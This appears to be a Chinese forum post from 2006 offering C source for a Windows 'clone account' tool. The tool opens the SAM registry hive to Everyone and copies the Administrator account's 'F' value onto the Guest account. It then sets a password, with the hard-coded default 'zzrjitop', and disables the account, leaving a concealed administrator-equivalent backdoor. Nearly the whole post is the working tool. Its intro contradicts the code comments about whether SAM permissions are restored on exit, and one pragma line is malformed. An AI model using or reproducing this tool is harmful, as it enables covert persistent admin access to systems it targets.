c语言简单实现克隆帐户

zlyuanna 发表于 2006-12-15 23:26 | 显示全部楼层 |阅读模式
c语言简单实现克隆帐户 — a small Windows account-cloning tool in C. What the listing below does, in order: (1) grants Everyone full control of HKLM\SAM\SAM with an inheritable ACE, after reading the current DACL; (2) enumerates SAM\SAM\Domains\Account\Users\Names for the entry whose RID is 0x1F5 (the Guest RID) and remembers its name; (3) copies the binary "F" value of the 000001F4 key (the Administrator RID) over the 000001F5 key; (4) runs `net user <name> <password>` and `net user <name> /active:no` through system(), with the password defaulting to the hard-coded "zzrjitop" when none is given on the command line. It must already run from an administrative console; nothing in it elevates. Caveat for readers: the original DACL is only put back on the FreeAndExit path, so every exit() in the listing (no 0x1F5 account found, a failed net user command, errors inside QueryKey) leaves SAM readable and writable by everyone.

#include <Windows.h>
#include <Aclapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#pragma comment (lib,\"Advapi32.lib\")

/* Forward declarations of the two helpers defined after main(). */
void QueryKey(HKEY hKey);   /* scans Users\Names for the RID 0x1F5 account; fills cloneUser / user_flag */
void banner(void);          /* prints the usage banner */

/* Buffer limits for registry names (same values as the MSDN RegEnumKeyEx sample). */
#define MAX_KEY_LENGTH 255      /* TCHARs in a subkey-name buffer */
#define MAX_VALUE_NAME 16383    /* TCHARs in a value-name / full-path buffer */

/* Shared state between main() and QueryKey(): QueryKey() sets user_flag to 1
 * and copies the matching account name into cloneUser when it finds an entry
 * whose RID is 0x1F5; main() reads both afterwards. */
DWORD user_flag = 0;
TCHAR cloneUser[1024];

/*
 * Set the console text attribute used for everything printed to STDOUT from
 * now on.  `color` is a raw console attribute word; the callers in this file
 * use 7 (grey), 10 (green), 12 (red), 14 (yellow) and 0 (black on black,
 * used right before the system() calls, presumably to hide their output).
 * Failures of GetStdHandle/SetConsoleTextAttribute are ignored, as in the
 * original: the colour simply stays as it was.
 */
void text_color(WORD color)
{
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), color);
}

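/*
 * Registry paths and limits used by main() and its helpers.  0x1F4 and 0x1F5
 * are DOMAIN_USER_RID_ADMIN and DOMAIN_USER_RID_GUEST from <winnt.h>; the
 * key names under Users\ are the RID printed as eight hex digits.
 */
#define SAM_KEY_NAME     _T("MACHINE\\SAM\\SAM")
#define ADMIN_KEY_PATH   _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4")
#define GUEST_KEY_PATH   _T("SAM\\SAM\\Domains\\Account\\Users\\000001F5")
#define NAMES_KEY_PATH   _T("SAM\\SAM\\Domains\\Account\\Users\\Names")
/* Password used when none is given on the command line.  It is a public
 * constant in this source, so anyone can log in to the cloned account with
 * it - always pass your own. */
#define DEFAULT_PASSWORD _T("zzrjitop")
#define F_VALUE_MAX      (1024 * 2)   /* byte buffer for the "F" value, same size as before */
#define CMD_MAX          1024         /* "net user ..." command-line buffer */

#ifdef UNICODE
#error "this tool mixes char *argv with TCHAR buffers; build it without UNICODE"
#endif

/* Print "<what> Error: <code>" in grey followed by a red "[Fail]" marker. */
static void report_fail(const TCHAR *what, DWORD err)
{
    text_color(7);
    _tprintf(_T("%s Error: %lu"), what, (unsigned long)err);
    text_color(12);
    _tprintf(_T("[Fail]\n"));
    text_color(7);
}

/* Print "<what>" in grey followed by a green "[OK]" marker. */
static void report_ok(const TCHAR *what)
{
    text_color(7);
    _tprintf(_T("%s"), what);
    text_color(10);
    _tprintf(_T("[OK]\n"));
    text_color(7);
}

/* Failure banner for a net user command, in the original's two-line form. */
static void report_cmd_fail(const TCHAR *msg)
{
    text_color(7);
    _tprintf(_T("%s"), msg);
    text_color(12);
    _tprintf(_T("\nFail\n"));
    text_color(7);
}

/*
 * True if `s` can be embedded in a cmd.exe command line without changing
 * its meaning: 1..127 characters, no control characters, none of the
 * cmd.exe metacharacters & | < > ^ " % ! ( ) and - unless allow_space -
 * no spaces.  run_net_user() quotes the account name, so spaces are
 * tolerated there; the password is passed unquoted, exactly as the original
 * tool passed it, so it must not contain any.
 */
static int shell_safe(const TCHAR *s, int allow_space)
{
    static const TCHAR forbidden[] = _T("&|<>^\"%!()");
    size_t i, len = _tcslen(s);

    if (len == 0 || len > 127)
        return 0;
    for (i = 0; i < len; i++) {
        TCHAR c = s[i];
        if (c == _T(' ')) {
            if (!allow_space)
                return 0;
            continue;
        }
        if ((unsigned)c < 0x20 || c == 0x7F || _tcschr(forbidden, c) != NULL)
            return 0;
    }
    return 1;
}

/*
 * Run `net user "<user>" <tail>` through the shell, with the console set to
 * black-on-black around the call so net.exe's output stays hidden (this is
 * what the original did with text_color(0)).  Returns the value of system():
 * 0 on success, -1 if the command would not fit in the buffer.  Both
 * arguments must already have passed shell_safe(): the string goes to
 * cmd.exe as-is.
 */
static int run_net_user(const TCHAR *user, const TCHAR *tail)
{
    TCHAR cmd[CMD_MAX];
    int n, rc;

    n = _sntprintf(cmd, CMD_MAX, _T("net user \"%s\" %s"), user, tail);
    if (n < 0 || n >= CMD_MAX)
        return -1;                 /* never run a truncated command */
    cmd[CMD_MAX - 1] = _T('\0');
    text_color(0);
    rc = _tsystem(cmd);
    text_color(7);
    return rc;
}

/*
 * Read the current DACL of `key` (HKLM\SAM\SAM) and replace it with one that
 * additionally grants Everyone KEY_ALL_ACCESS, inherited by all subkeys.
 * This is what lets the later RegOpenKeyEx calls on the Users\ subkeys
 * succeed.  On return *pSD / *pOldDacl describe the ORIGINAL descriptor
 * (the caller must restore it and LocalFree *pSD last, since *pOldDacl
 * points into it) and *pNewDacl is the LocalAlloc'd replacement.
 * Returns a Win32 error code; *step is the 1-based stage that failed,
 * matching the "Set Privilege (n)" messages of the original.
 */
static DWORD grant_everyone_on_sam(LPTSTR key, PSECURITY_DESCRIPTOR *pSD,
                                   PACL *pOldDacl, PACL *pNewDacl, int *step)
{
    SID_IDENTIFIER_AUTHORITY world = SECURITY_WORLD_SID_AUTHORITY;
    PSID everyone = NULL;
    EXPLICIT_ACCESS ea;
    DWORD rc;

    *step = 1;
    rc = GetNamedSecurityInfo(key, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                              NULL, NULL, pOldDacl, NULL, pSD);
    if (rc != ERROR_SUCCESS)
        return rc;

    *step = 2;
    /* Use the well-known SID S-1-1-0 rather than the name "Everyone": the
     * name is localised on non-English Windows, the SID is not. */
    if (!AllocateAndInitializeSid(&world, 1, SECURITY_WORLD_RID,
                                  0, 0, 0, 0, 0, 0, 0, &everyone))
        return GetLastError();

    ZeroMemory(&ea, sizeof ea);
    ea.grfAccessPermissions = KEY_ALL_ACCESS;
    ea.grfAccessMode = SET_ACCESS;
    ea.grfInheritance = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_SID;
    ea.Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
    ea.Trustee.ptstrName = (LPTSTR)everyone;

    rc = SetEntriesInAcl(1, &ea, *pOldDacl, pNewDacl);
    FreeSid(everyone);             /* SetEntriesInAcl copied the SID into the new ACL */
    if (rc != ERROR_SUCCESS)
        return rc;

    *step = 3;
    return SetNamedSecurityInfo(key, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                NULL, NULL, *pNewDacl, NULL);
}

/* Put the DACL saved by grant_everyone_on_sam() back on `key`. */
static DWORD restore_sam_dacl(LPTSTR key, PACL old_dacl)
{
    return SetNamedSecurityInfo(key, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                                NULL, NULL, old_dacl, NULL);
}

/*
 * The clone itself: read the "F" value of Users\000001F4 and write it over
 * the "F" value of Users\000001F5.  Opens each key with only the right it
 * needs, closes both, and returns a Win32 error code; *what names the API
 * call that failed so the caller can report it as the original did.
 */
static DWORD copy_f_value(const TCHAR **what)
{
    HKEY src = NULL, dst = NULL;
    BYTE data[F_VALUE_MAX];
    DWORD type = REG_BINARY;
    DWORD size = sizeof data;
    DWORD rc;

    *what = _T("RegOpenKeyEx");
    rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, ADMIN_KEY_PATH, 0, KEY_QUERY_VALUE, &src);
    if (rc != ERROR_SUCCESS)
        return rc;
    rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, GUEST_KEY_PATH, 0, KEY_SET_VALUE, &dst);
    if (rc == ERROR_SUCCESS) {
        *what = _T("RegQueryValueEx");
        rc = RegQueryValueEx(src, _T("F"), NULL, &type, data, &size);
    }
    if (rc == ERROR_SUCCESS) {
        *what = _T("RegSetValueEx");
        /* write with the type we read rather than assuming REG_BINARY */
        rc = RegSetValueEx(dst, _T("F"), 0, type, data, size);
    }
    if (dst)
        RegCloseKey(dst);
    RegCloseKey(src);
    return rc;
}

/*
 * Entry point.  Usage: clone.exe [password]
 *
 * Steps, in order:
 *   1. save the DACL of HKLM\SAM\SAM and add an inheritable Everyone
 *      KEY_ALL_ACCESS ACE to it;
 *   2. find the account whose RID is 0x1F5 via QueryKey() (-> cloneUser);
 *   3. copy the "F" value of Users\000001F4 over Users\000001F5;
 *   4. restore the saved DACL;
 *   5. run "net user <name> <password>" then "net user <name> /active:no".
 * The process must already be allowed to change the DACL of SAM\SAM (an
 * administrative console); nothing here elevates.
 *
 * Differences from the original main(): the DACL is restored on EVERY exit
 * path (the original's exit() calls bypassed FreeAndExit and left the
 * Everyone ACE in place), the DACL is restored before cmd.exe is spawned,
 * the command line is validated before the hive is touched, every registry
 * handle and buffer is released, each "[OK]" is printed after the step
 * succeeds rather than before it runs, and the exit code is 0 only on
 * success (5 when a net user command fails, 1 otherwise).
 *
 * Observable footprint on the host: a DACL change on HKLM\SAM\SAM, a 1F5 "F"
 * value identical to 1F4's, and cmd.exe/net.exe spawned by this process.
 */
int main(int argc, char **argv)
{
    LPTSTR sam_key = SAM_KEY_NAME;
    PSECURITY_DESCRIPTOR sd = NULL;   /* original descriptor; old_dacl points into it */
    PACL old_dacl = NULL;
    PACL new_dacl = NULL;             /* LocalAlloc'd by SetEntriesInAcl */
    HKEY names_key = NULL;
    const TCHAR *password;
    const TCHAR *failed_call = NULL;
    TCHAR step_msg[32];
    DWORD rc;
    int step = 0;
    int dacl_modified = 0;            /* 1 while the Everyone ACE is in place */
    int exit_code = 1;

    banner();

    /* Everything that can be checked is checked BEFORE the hive is touched,
     * so a bad command line never leaves SAM half-modified. */
    if (argc > 2) {
        text_color(12);
        _tprintf(_T("Usage: clone.exe [password]\n"));
        text_color(7);
        return 1;
    }
    password = (argc == 2) ? argv[1] : DEFAULT_PASSWORD;
    /* A leading '/' would turn the "password" into a net.exe switch. */
    if (!shell_safe(password, 0) || password[0] == _T('/')) {
        text_color(12);
        _tprintf(_T("Password rejected: 1-127 characters, no whitespace, no leading '/', none of &|<>^\"%%!()\n"));
        text_color(7);
        return 1;
    }

    /* Step 1: make SAM\SAM (and, through inheritance, its subkeys) fully
     * accessible to Everyone.  dacl_modified guarantees the undo below. */
    rc = grant_everyone_on_sam(sam_key, &sd, &old_dacl, &new_dacl, &step);
    if (rc != ERROR_SUCCESS) {
        _sntprintf(step_msg, 32, _T("Set Privilege (%d)"), step);
        step_msg[31] = _T('\0');
        report_fail(step_msg, rc);
        goto cleanup;
    }
    dacl_modified = 1;
    report_ok(_T("[+]Set Privilege.."));

    /* Step 2: find the account whose RID is 0x1F5; QueryKey() fills cloneUser. */
    rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, NAMES_KEY_PATH, 0, KEY_READ, &names_key);
    if (rc != ERROR_SUCCESS) {
        report_fail(_T("RegOpenKeyEx"), rc);
        goto cleanup;
    }
    QueryKey(names_key);
    RegCloseKey(names_key);
    names_key = NULL;
    if (user_flag == 0) {
        text_color(12);
        _tprintf(_T("The guest user may be delete!\n"));
        text_color(7);
        goto cleanup;
    }
    if (!shell_safe(cloneUser, 1)) {
        text_color(12);
        _tprintf(_T("Account name contains characters that cannot be passed to net.exe safely\n"));
        text_color(7);
        goto cleanup;
    }

    /* Step 3: the clone - 1F4's "F" value written over 1F5's. */
    rc = copy_f_value(&failed_call);
    if (rc != ERROR_SUCCESS) {
        report_fail(failed_call, rc);
        goto cleanup;
    }
    report_ok(_T("[+]Clone Successfully.."));

    /* Step 4: put the original DACL back NOW, before spawning cmd.exe - the
     * registry is not needed any more and the Everyone ACE should live as
     * briefly as possible. */
    rc = restore_sam_dacl(sam_key, old_dacl);
    dacl_modified = 0;
    if (rc != ERROR_SUCCESS) {
        report_fail(_T("Restore SAM DACL"), rc);
        goto cleanup;
    }

    /* Step 5: set the password, then disable the account. */
    if (run_net_user(cloneUser, password) != 0) {
        report_cmd_fail(_T("Set password fail..\n"));
        exit_code = 5;
        goto cleanup;
    }
    report_ok(_T("[+]Set user password.."));

    if (run_net_user(cloneUser, _T("/active:no")) != 0) {
        report_cmd_fail(_T("Disable account fail..\n"));
        exit_code = 5;
        goto cleanup;
    }
    report_ok(_T("[+]Disable account.."));

    text_color(14);
    _tprintf(_T("[+]User: %s Password: %s\n"), cloneUser, password);
    text_color(7);
    exit_code = 0;

cleanup:
    if (names_key)
        RegCloseKey(names_key);
    if (dacl_modified) {
        /* Only reached on an error path: undo the Everyone ACE regardless. */
        rc = restore_sam_dacl(sam_key, old_dacl);
        if (rc != ERROR_SUCCESS) {
            report_fail(_T("Restore SAM DACL"), rc);
            if (exit_code == 0)
                exit_code = 1;
        }
    }
    if (new_dacl)
        LocalFree(new_dacl);
    if (sd)
        LocalFree(sd);                /* also releases old_dacl, which lives inside sd */
    return exit_code;
}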

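/*
 * Find the account whose RID is 0x1F5 (DOMAIN_USER_RID_GUEST) and record its
 * name in the global cloneUser, setting user_flag = 1.  If none is found, or
 * a registry call fails, user_flag stays 0.
 *
 * hKey is an open handle to HKLM\SAM\SAM\Domains\Account\Users\Names; the
 * caller owns it and it is not closed here.  Each subkey of Names is an
 * account name, and - as in the original `type == 0x1f5` test - the REG type
 * field of that subkey's default value is read as the account's RID.
 *
 * Differences from the original: failures return instead of calling exit(),
 * so the caller keeps control of cleanup; subkeys are opened relative to
 * hKey with KEY_QUERY_VALUE instead of by absolute path with KEY_ALL_ACCESS;
 * every subkey handle is closed; and no heap buffer is allocated (and leaked)
 * per entry, because only the value's type is wanted - lpData == NULL with a
 * non-NULL lpcbData is the documented way to ask RegQueryValueEx for
 * type and size only.
 */
void QueryKey(HKEY hKey)
{
    TCHAR name[MAX_KEY_LENGTH + 1];   /* subkey name == account name */
    DWORD sub_keys = 0;
    DWORD i, rc;

    user_flag = 0;
    ZeroMemory(cloneUser, sizeof cloneUser);

    rc = RegQueryInfoKey(hKey, NULL, NULL, NULL, &sub_keys,
                         NULL, NULL, NULL, NULL, NULL, NULL, NULL);
    if (rc != ERROR_SUCCESS) {
        text_color(7);
        _tprintf(_T("RegQueryInfoKey Error: %lu"), (unsigned long)rc);
        text_color(12);
        _tprintf(_T("[Fail]\n"));
        text_color(7);
        return;
    }

    for (i = 0; i < sub_keys; i++) {
        DWORD name_len = MAX_KEY_LENGTH + 1;   /* in TCHARs, incl. terminator */
        DWORD type = REG_NONE;
        DWORD size = 0;
        HKEY user_key = NULL;

        rc = RegEnumKeyEx(hKey, i, name, &name_len, NULL, NULL, NULL, NULL);
        if (rc != ERROR_SUCCESS)
            continue;              /* the original also skipped entries it could not enumerate */

        rc = RegOpenKeyEx(hKey, name, 0, KEY_QUERY_VALUE, &user_key);
        if (rc != ERROR_SUCCESS) {
            text_color(7);
            _tprintf(_T("RegOpenKeyEx Error: %lu"), (unsigned long)rc);
            text_color(12);
            _tprintf(_T("[Fail]\n"));
            text_color(7);
            return;
        }

        rc = RegQueryValueEx(user_key, NULL, NULL, &type, NULL, &size);
        RegCloseKey(user_key);
        if (rc != ERROR_SUCCESS) {
            text_color(7);
            _tprintf(_T("RegQueryValueEx Error: %lu"), (unsigned long)rc);
            text_color(12);
            _tprintf(_T("[Fail]\n"));
            text_color(7);
            return;
        }

        if (type == DOMAIN_USER_RID_GUEST) {
            text_color(7);
            _tprintf(_T("[+]Starting clone %s.."), name);
            text_color(10);
            _tprintf(_T("[OK]\n"));
            text_color(7);
            /* name holds at most MAX_KEY_LENGTH TCHARs; cloneUser holds 1024 */
            _tcscpy(cloneUser, name);
            user_flag = 1;
            return;
        }
    }
}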


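/*
 * Print the tool's banner and one-line usage.  The credit line is printed
 * in red (attribute 12) and the colour is put back to grey (7) afterwards.
 * The listing this was taken from had lost the backslash of every "\n",
 * which would have run the whole banner together on one line; the line
 * breaks are restored here.
 */
void banner(void)
{
    text_color(7);
    _tprintf(_T("******************************************************\n"));
    _tprintf(_T("* Clone account Tool\n"));
    _tprintf(_T("* Clone the 1F5 user\n"));
    _tprintf(_T("* Usage: clone.exe or clone.exe pass\n"));
    _tprintf(_T("*"));
    text_color(12);
    _tprintf(_T(" If clone successfully it was made by zz[E.S.t]\n"));
    text_color(7);
    _tprintf(_T("******************************************************\n\n"));
}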